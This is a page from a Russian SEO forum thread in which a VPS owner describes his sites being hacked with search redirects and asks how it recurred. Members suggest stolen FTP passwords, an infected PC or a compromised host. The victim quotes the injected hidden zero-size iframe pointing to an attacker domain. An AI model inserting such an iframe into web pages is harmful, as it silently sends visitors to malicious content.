Взлом сервера - SEO форум MaulTalk.com

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Хостинг и серверы

4 страниц

1 2 3 4 >

Взлом сервера

Опции

vissavi

Topic Starter сообщение

17.5.2012, 13:49; Ответить: vissavi

Сообщение #1

Бывалый

Группа: User
Сообщений: 369
Регистрация: 28.1.2008
Поблагодарили: 82 раза
Репутация:

здравствуйте. Недавно у меня взломали сервер и внесли изменения почти во все файлы с расширением php (добавили код который переадресует пользователей с поисковых систем на другие сайты) из-за этого много сайтов вылетели из индекса... добавили новые файлы (создали дополнительные странички, внесли изменения в карту сайта) и т.д. Я это все выявил, восстановил из чистого архива движки сайтов. По безопасности сделал следующее: запретил использование почтовых портов, ssh, и вход в админ панель только с одного ip адреса (он у меня статический). Но вот сегодня обнаружил, что опять на сайтах произошли изменения. Согласно журнала был вход под моим ip с 00-43 до 00-50 и изменены файлы в основном index.php внесли фрейм вида "<iframe src="http://mazahack.net/go.ph4lb" width=0 height=0 frameborder=0></iframe>" ...
Хостинг от firstvds.ru, виртуальный выделенный сервер.
Подскажите пожалуйста как такое стало возможным (статический адрес только у меня такой) и как я смогу себя обезопасить. Спасибо.

--------------------

Выполню рерайт. Высокая уникальность.

Ответить с цитированием данного сообщения

livercom livercom 17.5.2012, 13:55; Сообщений: 545 Поблагодарили: 113 раз Репутация: 13 Просмотр профиля	17.5.2012, 13:55; Ответить: livercom Сообщение #2
Завсегдатай Группа: Banned Сообщений: 545 Регистрация: 22.5.2011 Из: Папуа — Новая Гвинея Поблагодарили: 113 раз Репутация: 13	Ну если все, как вы описали, то вредоносные программы осуществляли свою деятельность с вашего компьютера. Поблагодарили: (1) vissavi

House House 17.5.2012, 14:44; Сообщений: 628 Поблагодарили: 154 раза Репутация: 19 Просмотр профиля	17.5.2012, 14:44; Ответить: House Сообщение #3
Завсегдатай Группа: Banned Сообщений: 628 Регистрация: 2.11.2011 Из: Саранск Поблагодарили: 154 раза Репутация: 19	Вы стали частью ботнета или вируса, трояна и т.п. Поблагодарили: (1) vissavi

saraus saraus 17.5.2012, 14:54; Сообщений: 1219 Поблагодарили: 420 раз Репутация: 67 Просмотр профиля	17.5.2012, 14:54; Ответить: saraus Сообщение #4
Старожил Группа: Active User Сообщений: 1219 Регистрация: 21.6.2011 Поблагодарили: 420 раз Репутация: 67	(vissavi @ 17.5.2012, 12:49) под моим ip с 00-43 до 00-50 Ну если так, то зараза внутри скорее всего, надо чистить всё Поблагодарили: (1) vissavi

Goodhoster Goodhoster 17.5.2012, 15:40; Сообщений: 284 Поблагодарили: 72 раза Репутация: 8 Просмотр профиля	17.5.2012, 15:40; Ответить: Goodhoster Сообщение #5
Бывалый Группа: User Сообщений: 284 Регистрация: 3.12.2010 Поблагодарили: 72 раза Репутация: 8	надо делать анализ, смотря как настроены пользователь файлов и права доступа, не стоят ли права 777. Если процессы запускаются от пользователяи и права 644 - значит их изменили скорее всего под пользователем сайта, и скорее всего через данные доступа по FTP как часто бывает. Если Вы сохраняете пароль для FTP у себя на ПК в клиенте FTP - значит у Вас вирус на ПК, поменяйте пароли и не сохраняйте. Если например в w7 прикрепили FTP как диск там есть возможность и сохранили пароль - 100% с Вашего ПК крадут пароль. на сервере проверьте папки /tmp /var/tmp может там скрипты вредоносные, но скорее всего FTP ... -------------------- Goodhoster.NET - надежный профессиональный хостинг! ( Украина \| Германия ) Хостинг \| ВПС \| Серверы \| Домены Поблагодарили: (1) vissavi

expssh expssh 17.5.2012, 19:42; Сообщений: 128 Поблагодарили: 8 раз Репутация: 1 Просмотр профиля	17.5.2012, 19:42; Ответить: expssh Сообщение #6
Участник Группа: User Сообщений: 128 Регистрация: 12.7.2011 Поблагодарили: 8 раз Репутация: 1	Можем предоставить защищенный хостинг, если заинтересованы, обращайтесь в ICQ: 212073065 -------------------- http://economhost.com

asAlbert asAlbert 17.5.2012, 19:49; Сообщений: 992 Поблагодарили: 221 раз Репутация: 62 Просмотр профиля	17.5.2012, 19:49; Ответить: asAlbert Сообщение #7
http://http://http://http Группа: Active User Сообщений: 992 Регистрация: 15.12.2009 Из: /dev/null Поблагодарили: 221 раз Репутация: 62	Тут предлагают услуги по чистки гадости на серверах, свяжитесь с ними http://udalit-virus-s-saita.ru/

livercom livercom 17.5.2012, 20:23; Сообщений: 545 Поблагодарили: 113 раз Репутация: 13 Просмотр профиля	17.5.2012, 20:23; Ответить: livercom Сообщение #8
Завсегдатай Группа: Banned Сообщений: 545 Регистрация: 22.5.2011 Из: Папуа — Новая Гвинея Поблагодарили: 113 раз Репутация: 13	(expssh @ 17.5.2012, 18:42) Можем предоставить защищенный хостинг, если заинтересованы, обращайтесь в ICQ: 212073065 И чем же он защищен?

vissavi Topic Starter vissaviTopic Starter 17.5.2012, 20:46; Сообщений: 369 Поблагодарили: 82 раза Репутация: 24 Просмотр профиля	Topic Starter 17.5.2012, 20:46; Ответить: vissavi Сообщение #9
Бывалый Группа: User Сообщений: 369 Регистрация: 28.1.2008 Поблагодарили: 82 раза Репутация: 24	комп проверил - чист. и первый раз проверял.... Сейчас сменил пароли, закрыл ftp полностью. Понаблюдаю.. Висит в фоновых заданияю такая ерунда: buydomain var/run/ispmgr/buydomain.asdasdasdasadsdas.ru это нормально? Сообщение отредактировал vissavi - 17.5.2012, 20:54 -------------------- Выполню рерайт. Высокая уникальность.

rjksdfhe rjksdfhe 17.5.2012, 20:54; Сообщений: 2760 Поблагодарили: 1118 раз Репутация: 163 Просмотр профиля	17.5.2012, 20:54; Ответить: rjksdfhe Сообщение #10
Straight arms Группа: Active User Сообщений: 2760 Регистрация: 21.4.2009 Из: Мытищи, МО, РФ Поблагодарили: 1118 раз Репутация: 163	По описанному в первом посте, и если свой комп чист - только одно остаётся - взломали вашего хостера, и по полной программе (доступ, понятно, там есть и полный). В первую очередь надо логи посмотреть. Кто, куда, откуда.

« Предыдущая тема · Хостинг и серверы · Следующая тема »

4 страниц

1 2 3 4 >

3 чел. читают эту тему (гостей: 3, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Hyper.hosting - сервера под любые задачи [разрешены dmca, гэмблинг, адалт и пр.] Лучшие сервера по доступной цене	32	Hyper_Hosting	9139	15.4.2024, 13:03 автор: Hyper_Hosting
HideHost.net - Виртуальные и выделенные сервера под любые Ваши проекты с индивидуальным подходом. Работаем уже более 12 лет	6	HIDEHOST	2393	21.3.2024, 13:33 автор: Tihohodka
[РЕКОМЕНДУЮ] >>>Тестирование Вашего сайта, сервера на устойчивость и уязвимость!	7	barbaddos	9478	3.7.2023, 20:18 автор: barbaddos
Ускорение вашего сайта и сервера. Системный администратор Linux	44	EvaSystems	41795	6.2.2023, 13:07 автор: EvaSystems
Обучение Email Рассылкам + Софт Для Автоматизации (100к в сутки с сервера)	8	zennoboss	4462	19.3.2022, 18:46 автор: zennoboss

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 18.4.2024, 22:02

Дизайн